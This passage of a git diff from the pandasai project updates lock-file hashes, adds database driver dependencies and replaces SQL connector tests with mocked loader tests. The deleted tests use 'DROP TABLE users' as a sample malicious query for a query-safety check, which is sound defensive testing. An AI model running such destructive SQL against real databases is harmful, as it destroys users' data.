+ {file = "psycopg2_binary-2.9.10-cp311-cp311-win_amd64.whl", hash = "sha256:ee0e8c683a7ff25d23b55b11161c2663d4b099770f6085ff0a20d4505778d6b4"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-macosx_12_0_x86_64.whl", hash = "sha256:880845dfe1f85d9d5f7c412efea7a08946a46894537e4e5d091732eb1d34d9a0"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-macosx_14_0_arm64.whl", hash = "sha256:9440fa522a79356aaa482aa4ba500b65f28e5d0e63b801abf6aa152a29bd842a"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e3923c1d9870c49a2d44f795df0c889a22380d36ef92440ff618ec315757e539"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7b2c956c028ea5de47ff3a8d6b3cc3330ab45cf0b7c3da35a2d6ff8420896526"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f758ed67cab30b9a8d2833609513ce4d3bd027641673d4ebc9c067e4d208eec1"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8cd9b4f2cfab88ed4a9106192de509464b75a906462fb846b936eabe45c2063e"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:6dc08420625b5a20b53551c50deae6e231e6371194fa0651dbe0fb206452ae1f"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-musllinux_1_2_i686.whl", hash = "sha256:d7cd730dfa7c36dbe8724426bf5612798734bff2d3c3857f36f2733f5bfc7c00"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-musllinux_1_2_ppc64le.whl", hash = "sha256:155e69561d54d02b3c3209545fb08938e27889ff5a10c19de8d23eb5a41be8a5"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:c3cc28a6fd5a4a26224007712e79b81dbaee2ffb90ff406256158ec4d7b52b47"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-win32.whl", hash = "sha256:ec8a77f521a17506a24a5f626cb2aee7850f9b69a0afe704586f63a464f3cd64"},
+ {file = "psycopg2_binary-2.9.10-cp312-cp312-win_amd64.whl", hash = "sha256:18c5ee682b9c6dd3696dad6e54cc7ff3a1a9020df6a5c0f861ef8bfd338c3ca0"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-macosx_12_0_x86_64.whl", hash = "sha256:26540d4a9a4e2b096f1ff9cce51253d0504dca5a85872c7f7be23be5a53eb18d"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-macosx_14_0_arm64.whl", hash = "sha256:e217ce4d37667df0bc1c397fdcd8de5e81018ef305aed9415c3b093faaeb10fb"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:245159e7ab20a71d989da00f280ca57da7641fa2cdcf71749c193cea540a74f7"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3c4ded1a24b20021ebe677b7b08ad10bf09aac197d6943bfe6fec70ac4e4690d"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3abb691ff9e57d4a93355f60d4f4c1dd2d68326c968e7db17ea96df3c023ef73"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8608c078134f0b3cbd9f89b34bd60a943b23fd33cc5f065e8d5f840061bd0673"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:230eeae2d71594103cd5b93fd29d1ace6420d0b86f4778739cb1a5a32f607d1f"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-musllinux_1_2_i686.whl", hash = "sha256:bb89f0a835bcfc1d42ccd5f41f04870c1b936d8507c6df12b7737febc40f0909"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-musllinux_1_2_ppc64le.whl", hash = "sha256:f0c2d907a1e102526dd2986df638343388b94c33860ff3bbe1384130828714b1"},
+ {file = "psycopg2_binary-2.9.10-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:f8157bed2f51db683f31306aa497311b560f2265998122abe1dce6428bd86567"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-macosx_12_0_x86_64.whl", hash = "sha256:eb09aa7f9cecb45027683bb55aebaaf45a0df8bf6de68801a6afdc7947bb09d4"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b73d6d7f0ccdad7bc43e6d34273f70d587ef62f824d7261c4ae9b8b1b6af90e8"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ce5ab4bf46a211a8e924d307c1b1fcda82368586a19d0a24f8ae166f5c784864"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:056470c3dc57904bbf63d6f534988bafc4e970ffd50f6271fc4ee7daad9498a5"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:73aa0e31fa4bb82578f3a6c74a73c273367727de397a7a0f07bd83cbea696baa"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:8de718c0e1c4b982a54b41779667242bc630b2197948405b7bd8ce16bcecac92"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-musllinux_1_2_i686.whl", hash = "sha256:5c370b1e4975df846b0277b4deba86419ca77dbc25047f535b0bb03d1a544d44"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-musllinux_1_2_ppc64le.whl", hash = "sha256:ffe8ed017e4ed70f68b7b371d84b7d4a790368db9203dfc2d222febd3a9c8863"},
+ {file = "psycopg2_binary-2.9.10-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:8aecc5e80c63f7459a1a2ab2c64df952051df196294d9f739933a9f6687e86b3"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-macosx_12_0_x86_64.whl", hash = "sha256:7a813c8bdbaaaab1f078014b9b0b13f5de757e2b5d9be6403639b298a04d218b"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d00924255d7fc916ef66e4bf22f354a940c67179ad3fd7067d7a0a9c84d2fbfc"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7559bce4b505762d737172556a4e6ea8a9998ecac1e39b5233465093e8cee697"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e8b58f0a96e7a1e341fc894f62c1177a7c83febebb5ff9123b579418fdc8a481"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6b269105e59ac96aba877c1707c600ae55711d9dcd3fc4b5012e4af68e30c648"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:79625966e176dc97ddabc142351e0409e28acf4660b88d1cf6adb876d20c490d"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-musllinux_1_2_i686.whl", hash = "sha256:8aabf1c1a04584c168984ac678a668094d831f152859d06e055288fa515e4d30"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-musllinux_1_2_ppc64le.whl", hash = "sha256:19721ac03892001ee8fdd11507e6a2e01f4e37014def96379411ca99d78aeb2c"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:7f5d859928e635fa3ce3477704acee0f667b3a3d3e4bb109f2b18d4005f38287"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-win32.whl", hash = "sha256:3216ccf953b3f267691c90c6fe742e45d890d8272326b4a8b20850a03d05b7b8"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-win_amd64.whl", hash = "sha256:30e34c4e97964805f715206c7b789d54a78b70f3ff19fbe590104b71c45600e5"},
+]
+
[[package]]
name = "pydantic"
version = "2.9.2"
@@ -1350,6 +1437,21 @@ files = [
[package.dependencies]
typing-extensions = ">=4.6.0,<4.7.0 || >4.7.0"
+[[package]]
+name = "pymysql"
+version = "1.1.1"
+description = "Pure Python MySQL Driver"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "PyMySQL-1.1.1-py3-none-any.whl", hash = "sha256:4de15da4c61dc132f4fb9ab763063e693d521a80fd0e87943b9a453dd4c19d6c"},
+ {file = "pymysql-1.1.1.tar.gz", hash = "sha256:e127611aaf2b417403c60bf4dc570124aeb4a57f5f37b8e95ae399a42f904cd0"},
+]
+
+[package.extras]
+ed25519 = ["PyNaCl (>=1.4.0)"]
+rsa = ["cryptography"]
+
[[package]]
name = "pyparsing"
version = "3.2.0"
@@ -2294,4 +2396,4 @@ type = ["pytest-mypy"]
[metadata]
lock-version = "2.0"
python-versions = ">=3.9,<4.0"
-content-hash = "9297bb6278d2ca36ffab1fd12441ae41d39889e1fda1227215e8b722830cd67f"
+content-hash = "c1d69c6679692e0d196319b60a377fa734b3ff55aedadc1a092357f048d37e59"
diff --git a/extensions/connectors/sql/pyproject.toml b/extensions/connectors/sql/pyproject.toml
index 3ff99eefb..0549598c4 100644
--- a/extensions/connectors/sql/pyproject.toml
+++ b/extensions/connectors/sql/pyproject.toml
@@ -20,6 +20,12 @@ pytest = "^7.4.0"
pytest-cov = "^4.1.0"
pytest-mock = "^3.11.1"
+
+[tool.poetry.group.dev.dependencies]
+pymysql = "^1.1.1"
+psycopg2-binary = "^2.9.10"
+cockroachdb = "^0.3.5"
+
[build-system]
requires = ["poetry-core"]
build-backend = "poetry.core.masonry.api"
diff --git a/extensions/connectors/sql/tests/test_sql.py b/extensions/connectors/sql/tests/test_sql.py
index 0853f2e27..0b5e78927 100644
--- a/extensions/connectors/sql/tests/test_sql.py
+++ b/extensions/connectors/sql/tests/test_sql.py
@@ -1,361 +1,149 @@
import unittest
-from unittest.mock import Mock, patch
-
+from unittest.mock import patch, MagicMock
import pandas as pd
+# Assuming the functions are in a module called db_loader
from pandasai_sql import (
- SQLConnector,
- SQLConnectorConfig,
load_from_mysql,
load_from_postgres,
+ load_from_sqlite,
+ load_from_cockroachdb,
)
-from pandasai_sql.sql import (
- PostgreSQLConnector,
- MySQLConnector,
-)
-from pandasai.exceptions import MaliciousQueryError
-
-
-class TestSQLConnector(unittest.TestCase):
- @patch("pandasai_sql.sql.create_engine", autospec=True)
- def setUp(self, mock_create_engine):
- # Create a mock engine and connection
- self.mock_engine = Mock()
- self.mock_connection = Mock()
- self.mock_engine.connect.return_value = self.mock_connection
- mock_create_engine.return_value = self.mock_engine
-
- # Define your ConnectorConfig instance here
- self.config = SQLConnectorConfig(
- dialect="mysql",
- driver="pymysql",
- username="your_username",
- password="your_password",
- host="your_host",
- port=443,
- database="your_database",
- table="your_table",
- where=[["column_name", "=", "value"]],
- ).dict()
-
- # Create an instance of SQLConnector
- self.connector = SQLConnector(self.config)
-
- @patch("pandasai_sql.sql.SQLConnector._load_connector_config")
- @patch("pandasai_sql.sql.SQLConnector._init_connection")
- def test_constructor_and_properties(
- self, mock_load_connector_config, mock_init_connection
- ):
- # Test constructor and properties
-
- self.assertEqual(self.connector.config.model_dump(), self.config)
- self.assertEqual(self.connector._engine, self.mock_engine)
- self.assertEqual(self.connector._connection, self.mock_connection)
- self.assertEqual(self.connector._cache_interval, 600)
- SQLConnector(self.config)
- mock_load_connector_config.assert_called()
- mock_init_connection.assert_called()
-
- def test_repr_method(self):
- # Test __repr__ method
- expected_repr = (
- ""
- )
- self.assertEqual(repr(self.connector), expected_repr)
-
- def test_build_query_method(self):
- # Test _build_query method
- query = self.connector._build_query(limit=5, order="RAND()")
- expected_query = """SELECT *
-FROM your_table
-WHERE column_name = :value_0 ORDER BY RAND() ASC
- LIMIT :param_1"""
- self.assertEqual(str(query), expected_query)
- @patch("pandasai_sql.sql.pd.read_sql", autospec=True)
- def test_head_method(self, mock_read_sql):
- expected_data = pd.DataFrame({"Column1": [1, 2, 3], "Column2": [4, 5, 6]})
- mock_read_sql.return_value = expected_data
- head_data = self.connector.head()
- pd.testing.assert_frame_equal(head_data, expected_data)
-
- def test_rows_count_property(self):
- # Test rows_count property
- self.connector._rows_count = None
- self.mock_connection.execute.return_value.fetchone.return_value = (
- 50,
- ) # Sample rows count
- rows_count = self.connector.rows_count
- self.assertEqual(rows_count, 50)
-
- def test_columns_count_property(self):
- # Test columns_count property
- self.connector._columns_count = None
- mock_df = Mock()
- mock_df.columns = ["Column1", "Column2"]
- self.connector.head = Mock(return_value=mock_df)
- columns_count = self.connector.columns_count
- self.assertEqual(columns_count, 2)
-
- def test_column_hash_property(self):
- # Test column_hash property
- mock_df = Mock()
- mock_df.columns = ["Column1", "Column2"]
- self.connector.head = Mock(return_value=mock_df)
- column_hash = self.connector.column_hash
- self.assertIsNotNone(column_hash)
- self.assertEqual(
- column_hash,
- "ea6a80582b83e1511f8be83412b13e7b86d20c45b96fcf9731f3b99dc3b568aa",
+class TestDatabaseLoader(unittest.TestCase):
+ @patch("pymysql.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_mysql(self, mock_read_sql, mock_pymysql_connect):
+ # Setup the mock return values
+ mock_conn = MagicMock()
+ mock_pymysql_connect.return_value = mock_conn
+ mock_read_sql.return_value = pd.DataFrame(
+ {"column1": [1, 2], "column2": [3, 4]}
)
- def test_fallback_name_property(self):
- # Test fallback_name property
- fallback_name = self.connector.fallback_name
- self.assertEqual(fallback_name, "your_table")
-
- def test_is_sql_query_safe_safe_query(self):
- safe_query = "SELECT * FROM users WHERE username = 'John'"
- result = self.connector._is_sql_query_safe(safe_query)
- assert result is True
-
- def test_is_sql_query_safe_malicious_query(self):
- malicious_query = "DROP TABLE users"
- result = self.connector._is_sql_query_safe(malicious_query)
- assert result is False
-
- @patch("pandasai_sql.sql.pd.read_sql", autospec=True)
- def test_execute_direct_sql_query_safe_query(self, mock_sql):
- safe_query = "SELECT * FROM users WHERE username = 'John'"
- expected_data = pd.DataFrame({"Column1": [1, 2, 3], "Column2": [4, 5, 6]})
- mock_sql.return_value = expected_data
- result = self.connector.execute_direct_sql_query(safe_query)
- assert isinstance(result, pd.DataFrame)
-
- def test_execute_direct_sql_query_malicious_query(self):
- malicious_query = "DROP TABLE users"
- try:
- self.connector.execute_direct_sql_query(malicious_query)
- assert False, "MaliciousQueryError not raised"
- except MaliciousQueryError:
- pass
-
- @patch("pandasai_sql.sql.SQLConnector._init_connection")
- def test_equals_identical_configs(self, mock_init_connection):
- # Define your ConnectorConfig instance here
- self.config = SQLConnectorConfig(
- dialect="mysql",
- driver="pymysql",
- username="your_username",
- password="your_password",
- host="your_host",
- port=443,
- database="your_database",
- table="your_table",
- where=[["column_name", "=", "value"]],
- ).dict()
-
- # Create an instance of SQLConnector
- connector_2 = SQLConnector(self.config)
-
- assert self.connector.equals(connector_2)
-
- @patch("pandasai_sql.sql.SQLConnector._load_connector_config")
- @patch("pandasai_sql.sql.SQLConnector._init_connection")
- def test_equals_different_configs(
- self, mock_load_connector_config, mock_init_connection
- ):
- # Define your ConnectorConfig instance here
- self.config = SQLConnectorConfig(
- dialect="mysql",
- driver="pymysql",
- username="your_username_differ",
- password="your_password",
- host="your_host",
- port=443,
- database="your_database",
- table="your_table",
- where=[["column_name", "=", "value"]],
- ).dict()
-
- # Create an instance of SQLConnector
- connector_2 = SQLConnector(self.config)
-
- assert not self.connector.equals(connector_2)
-
- @patch("pandasai_sql.sql.SQLConnector._init_connection")
- def test_equals_different_connector(self, mock_init_connection):
- # Define your ConnectorConfig instance here
- self.config = SQLConnectorConfig(
- dialect="postgresql",
- driver="psycopg2",
- username="your_username_differ",
- password="your_password",
- host="your_host",
- port=443,
- database="your_database",
- table="your_table",
- where=[["column_name", "=", "value"]],
- ).dict()
-
- # Create an instance of SQLConnector
- connector_2 = PostgreSQLConnector(self.config)
-
- assert not self.connector.equals(connector_2)
-
- @patch("pandasai_sql.sql.SQLConnector._init_connection")
- def test_equals_connector_type(self, mock_init_connection):
- # Define your ConnectorConfig instance here
- config = {
- "username": "your_username_differ",
- "password": "your_password",
- "host": "your_host",
- "port": 443,
- "database": "your_database",
- "table": "your_table",
- "where": [["column_name", "=", "value"]],
+ # Test data
+ connection_info = {
+ "host": "localhost",
+ "user": "root",
+ "password": "password",
+ "database": "test_db",
+ "port": 3306,
}
+ query = "SELECT * FROM test_table"
- # Create an instance of SQLConnector
- connector_2 = PostgreSQLConnector(config)
-
- assert connector_2.type == "postgresql"
+ result = load_from_mysql(connection_info, query)
- @patch("pandasai_sql.sql.SQLConnector._init_connection")
- def test_equals_sql_connector_type(self, mock_init_connection):
- # Define your ConnectorConfig instance here
+ # Assert that the connection is made and SQL query is executed
+ mock_pymysql_connect.assert_called_once_with(
+ host="localhost",
+ user="root",
+ password="password",
+ database="test_db",
+ port=3306,
+ )
+ mock_read_sql.assert_called_once_with(query, mock_conn)
+
+ # Assert the result is a DataFrame
+ self.assertIsInstance(result, pd.DataFrame)
+ self.assertEqual(result.shape, (2, 2))
+
+ @patch("psycopg2.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_postgres(self, mock_read_sql, mock_psycopg2_connect):
+ # Setup the mock return values
+ mock_conn = MagicMock()
+ mock_psycopg2_connect.return_value = mock_conn
+ mock_read_sql.return_value = pd.DataFrame(
+ {"column1": [5, 6], "column2": [7, 8]}
+ )
- config = {
- "username": "your_username_differ",
- "password": "your_password",
- "host": "your_host",
- "port": 443,
- "database": "your_database",
- "table": "your_table",
- "where": [["column_name", "=", "value"]],
+ # Test data
+ connection_info = {
+ "host": "localhost",
+ "user": "postgres",
+ "password": "password",
+ "database": "test_db",
+ "port": 5432,
}
+ query = "SELECT * FROM test_table"
- # Create an instance of SQLConnector
- connector_2 = MySQLConnector(config)
-
- assert connector_2.type == "mysql"
+ result = load_from_postgres(connection_info, query)
- @patch("pandasai_sql.sql.create_engine", autospec=True)
- def test_connector_constructor_with_ssl_settings(self, create_engine_mock):
- config = SQLConnectorConfig(
- dialect="mysql",
- driver="pymysql",
- username="your_username",
- password="your_password",
- host="your_host",
- port=443,
- database="your_database",
- table="your_table",
- connect_args={"sslmode": "require", "sslrootcert": None},
- where=[["column_name", "=", "value"]],
- ).dict()
- SQLConnector(config)
- create_engine_mock.assert_called_with(
- "mysql+pymysql://your_username:your_password@your_host:443/your_database",
- connect_args={"sslmode": "require", "sslrootcert": None},
+ # Assert that the connection is made and SQL query is executed
+ mock_psycopg2_connect.assert_called_once_with(
+ host="localhost",
+ user="postgres",
+ password="password",
+ dbname="test_db",
+ port=5432,
)
-
- @patch("pandasai_sql.sql.create_engine", autospec=True)
- def test_connector_constructor_with_no_ssl_settings(self, create_engine_mock):
- config = SQLConnectorConfig(
- dialect="mysql",
- driver="pymysql",
- username="your_username",
- password="your_password",
- host="your_host",
- port=443,
- database="your_database",
- table="your_table",
- where=[["column_name", "=", "value"]],
- ).dict()
- SQLConnector(config)
- create_engine_mock.assert_called_with(
- "mysql+pymysql://your_username:your_password@your_host:443/your_database",
- connect_args={},
+ mock_read_sql.assert_called_once_with(query, mock_conn)
+
+ # Assert the result is a DataFrame
+ self.assertIsInstance(result, pd.DataFrame)
+ self.assertEqual(result.shape, (2, 2))
+
+ @patch("sqlite3.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_sqlite(self, mock_read_sql, mock_sqlite3_connect):
+ # Setup the mock return values
+ mock_conn = MagicMock()
+ mock_sqlite3_connect.return_value = mock_conn
+ mock_read_sql.return_value = pd.DataFrame(
+ {"column1": [9, 10], "column2": [11, 12]}
)
- @patch("pandasai_sql.sql.SQLConnector._init_connection")
- @patch("pandasai_sql.sql.pd.read_sql")
- def test_equals_connector_execute_direct_sql(
- self, mock_read_sql, mock_init_connection
- ):
- # Define your ConnectorConfig instance here
- config = {
- "username": "your_username_differ",
- "password": "your_password",
- "host": "your_host",
- "port": 443,
- "database": "your_database",
- "table": "your_table",
- "where": [["column_name", "=", "value"]],
- }
+ # Test data
+ connection_info = {"database": "test_db.sqlite"}
+ query = "SELECT * FROM test_table"
- # Create an instance of SQLConnector
- connector_2 = PostgreSQLConnector(config)
+ result = load_from_sqlite(connection_info, query)
- connector_2.execute_direct_sql_query("SELECT * from `orders`")
+ # Assert that the connection is made and SQL query is executed
+ mock_sqlite3_connect.assert_called_once_with("test_db.sqlite")
+ mock_read_sql.assert_called_once_with(query, mock_conn)
- mock_read_sql.assert_called_once()
+ # Assert the result is a DataFrame
+ self.assertIsInstance(result, pd.DataFrame)
+ self.assertEqual(result.shape, (2, 2))
+ @patch("psycopg2.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_cockroachdb(self, mock_read_sql, mock_cockroachdb_connect):
+ # Setup the mock return values
+ mock_conn = MagicMock()
+ mock_cockroachdb_connect.return_value = mock_conn
+ mock_read_sql.return_value = pd.DataFrame(
+ {"column1": [13, 14], "column2": [15, 16]}
+ )
-class TestSQLLoaders(unittest.TestCase):
- def setUp(self):
- self.connection_info = {
+ # Test data
+ connection_info = {
"host": "localhost",
- "user": "testuser",
- "password": "testpass",
- "database": "testdb",
- "port": 3306,
+ "user": "root",
+ "password": "password",
+ "database": "test_db",
+ "port": 26257,
}
- self.query = "SELECT * FROM test_table"
-
- @patch("pandasai_sql.pd.read_sql")
- def test_load_from_mysql(self, mock_read_sql):
- mock_pymysql = Mock()
- mock_connection = Mock()
- mock_pymysql.connect.return_value = mock_connection
-
- expected_df = pd.DataFrame({"col1": [1, 2], "col2": ["a", "b"]})
- mock_read_sql.return_value = expected_df
+ query = "SELECT * FROM test_table"
- with patch.dict("sys.modules", {"pymysql": mock_pymysql}):
- result = load_from_mysql(self.connection_info, self.query)
+ result = load_from_cockroachdb(connection_info, query)
- mock_pymysql.connect.assert_called_once_with(
- host=self.connection_info["host"],
- user=self.connection_info["user"],
- password=self.connection_info["password"],
- database=self.connection_info["database"],
- port=self.connection_info["port"],
+ # Assert that the connection is made and SQL query is executed
+ mock_cockroachdb_connect.assert_called_once_with(
+ host="localhost",
+ user="root",
+ password="password",
+ dbname="test_db",
+ port=26257,
)
- mock_read_sql.assert_called_once_with(self.query, mock_connection)
- pd.testing.assert_frame_equal(result, expected_df)
+ mock_read_sql.assert_called_once_with(query, mock_conn)
- @patch("pandasai_sql.pd.read_sql")
- def test_load_from_postgres(self, mock_read_sql):
- mock_psycopg2 = Mock()
- mock_connection = Mock()
- mock_psycopg2.connect.return_value = mock_connection
+ # Assert the result is a DataFrame
+ self.assertIsInstance(result, pd.DataFrame)
+ self.assertEqual(result.shape, (2, 2))
- expected_df = pd.DataFrame({"col1": [1, 2], "col2": ["a", "b"]})
- mock_read_sql.return_value = expected_df
- with patch.dict("sys.modules", {"psycopg2": mock_psycopg2}):
- result = load_from_postgres(self.connection_info, self.query)
-
- mock_psycopg2.connect.assert_called_once_with(
- host=self.connection_info["host"],
- user=self.connection_info["user"],
- password=self.connection_info["password"],
- dbname=self.connection_info["database"],
- port=self.connection_info["port"],
- )
- mock_read_sql.assert_called_once_with(self.query, mock_connection)
- pd.testing.assert_frame_equal(result, expected_df)
+if __name__ == "__main__":
+ unittest.main()
diff --git a/extensions/connectors/sql/tests/test_sql_connector.py b/extensions/connectors/sql/tests/test_sql_connector.py
deleted file mode 100644
index 91bd459e3..000000000
--- a/extensions/connectors/sql/tests/test_sql_connector.py
+++ /dev/null
@@ -1,36 +0,0 @@
-"""Unit tests for SQL connector"""
-
-import pytest
-from unittest.mock import MagicMock
-from pandasai.agent import Agent
-from pandasai.exceptions import InvalidConfigError
-
-
-class TestSQLConnector:
- """Unit tests for SQL connector"""
-
- @pytest.fixture
- def sql_connector(self):
- mock_connector = MagicMock()
- mock_connector.type = "sql"
- mock_connector.get_table_names.return_value = ["table1", "table2"]
- return mock_connector
-
- @pytest.fixture
- def pgsql_connector(self):
- mock_connector = MagicMock()
- mock_connector.type = "postgresql"
- mock_connector.get_table_names.return_value = ["table3", "table4"]
- return mock_connector
-
- def test_validate_multiple_sql_connectors(self, sql_connector, pgsql_connector):
- """Test that agent raises an error when initialized with multiple SQL connectors"""
- llm = MagicMock()
- llm.type = "fake"
-
- with pytest.raises(InvalidConfigError):
- Agent(
- [sql_connector, pgsql_connector],
- {"llm": llm, "direct_sql": False},
- vectorstore=MagicMock(),
- )
diff --git a/extensions/connectors/sql/tests/test_sqlite.py b/extensions/connectors/sql/tests/test_sqlite.py
deleted file mode 100644
index b94089b87..000000000
--- a/extensions/connectors/sql/tests/test_sqlite.py
+++ /dev/null
@@ -1,113 +0,0 @@
-import unittest
-from unittest.mock import Mock, patch
-
-import pandas as pd
-
-from pandasai_sql.sql import (
- SqliteConnector,
- SqliteConnectorConfig,
-)
-
-
-class TestSqliteConnector(unittest.TestCase):
- @patch("pandasai_sql.sql.create_engine", autospec=True)
- def setUp(self, mock_create_engine) -> None:
- self.mock_engine = Mock()
- self.mock_connection = Mock()
- self.mock_engine.connect.return_value = self.mock_connection
- mock_create_engine.return_value = self.mock_engine
-
- self.config = SqliteConnectorConfig(
- dialect="sqlite", database="path_todb.db", table="yourtable"
- ).dict()
-
- self.connector = SqliteConnector(self.config)
-
- @patch("pandasai_sql.sql.SqliteConnector._load_connector_config")
- @patch("pandasai_sql.sql.SqliteConnector._init_connection")
- def test_constructor_and_properties(
- self, mock_load_connector_config, mock_init_connection
- ):
- # Test constructor and properties
- self.assertEqual(self.connector.config.model_dump(), self.config)
- self.assertEqual(self.connector._engine, self.mock_engine)
- self.assertEqual(self.connector._connection, self.mock_connection)
- self.assertEqual(self.connector._cache_interval, 600)
- SqliteConnector(self.config)
- mock_load_connector_config.assert_called()
- mock_init_connection.assert_called()
-
- def test_repr_method(self):
- # Test __repr__ method
- expected_repr = (
- ""
- )
- self.assertEqual(repr(self.connector), expected_repr)
-
- @patch("pandasai_sql.sql.pd.read_sql", autospec=True)
- def test_head_method(self, mock_read_sql):
- expected_data = pd.DataFrame({"Column1": [1, 2, 3], "Column2": [4, 5, 6]})
- mock_read_sql.return_value = expected_data
- head_data = self.connector.head()
- pd.testing.assert_frame_equal(head_data, expected_data)
-
- def test_rows_count_property(self):
- # Test rows_count property
- self.connector._rows_count = None
- self.mock_connection.execute.return_value.fetchone.return_value = (
- 50,
- ) # Sample rows count
- rows_count = self.connector.rows_count
- self.assertEqual(rows_count, 50)
-
- def test_columns_count_property(self):
- # Test columns_count property
- self.connector._columns_count = None
- mock_df = Mock()
- mock_df.columns = ["Column1", "Column2"]
- self.connector.head = Mock(return_value=mock_df)
- columns_count = self.connector.columns_count
- self.assertEqual(columns_count, 2)
-
- def test_column_hash_property(self):
- # Test column_hash property
- mock_df = Mock()
- mock_df.columns = ["Column1", "Column2"]
- self.connector.head = Mock(return_value=mock_df)
- column_hash = self.connector.column_hash
- self.assertIsNotNone(column_hash)
- self.assertEqual(
- column_hash,
- "0d045cff164deef81e24b0ed165b7c9c2789789f013902115316cde9d214fe63",
- )
-
- def test_fallback_name_property(self):
- # Test fallback_name property
- fallback_name = self.connector.fallback_name
- self.assertEqual(fallback_name, "yourtable")
-
- @patch("pandasai_sql.sql.SqliteConnector._init_connection")
- def test_two_connector_equal(self, mock_init_connection):
- conn1 = SqliteConnector(self.config)
-
- conn2 = SqliteConnector(self.config)
-
- assert conn1.equals(conn2)
-
- config2 = SqliteConnectorConfig(
- dialect="sqlite", database="path_todb.db", table="different_table"
- ).dict()
- conn3 = SqliteConnector(config2)
-
- assert conn1.equals(conn3)
-
- @patch("pandasai_sql.sql.SqliteConnector._init_connection")
- def test_two_connector_not_equal(self, mock_init_connection):
- conn1 = SqliteConnector(self.config)
-
- config2 = SqliteConnectorConfig(
- dialect="sqlite", database="path_todb2.db", table="yourtable"
- ).dict()
- conn3 = SqliteConnector(config2)
-
- assert not conn1.equals(conn3)
diff --git a/extensions/connectors/yfinance/pandasai_yfinance/__init__.py b/extensions/connectors/yfinance/pandasai_yfinance/__init__.py
index 31671b34d..c5ceede71 100644
--- a/extensions/connectors/yfinance/pandasai_yfinance/__init__.py
+++ b/extensions/connectors/yfinance/pandasai_yfinance/__init__.py
@@ -1,11 +1,10 @@
-from .yahoo_finance import YahooFinanceConnector
-
def load_from_yahoo_finance(connection_info, query):
import yfinance as yf
-
+
ticker = yf.Ticker(connection_info["ticker"])
data = ticker.history(period=connection_info.get("period", "1mo"))
-
+
return data.to_csv(index=True)
-__all__ = ["YahooFinanceConnector"]
\ No newline at end of file
+
+__all__ = ["load_from_yahoo_finance"]
diff --git a/extensions/connectors/yfinance/pandasai_yfinance/yahoo_finance.py b/extensions/connectors/yfinance/pandasai_yfinance/yahoo_finance.py
deleted file mode 100644
index 173e688a8..000000000
--- a/extensions/connectors/yfinance/pandasai_yfinance/yahoo_finance.py
+++ /dev/null
@@ -1,199 +0,0 @@
-import hashlib
-import os
-import time
-from typing import Optional, Union
-
-import pandas as pd
-
-from pandasai.constants import DEFAULT_FILE_PERMISSIONS
-from pandasai.helpers.path import find_project_root
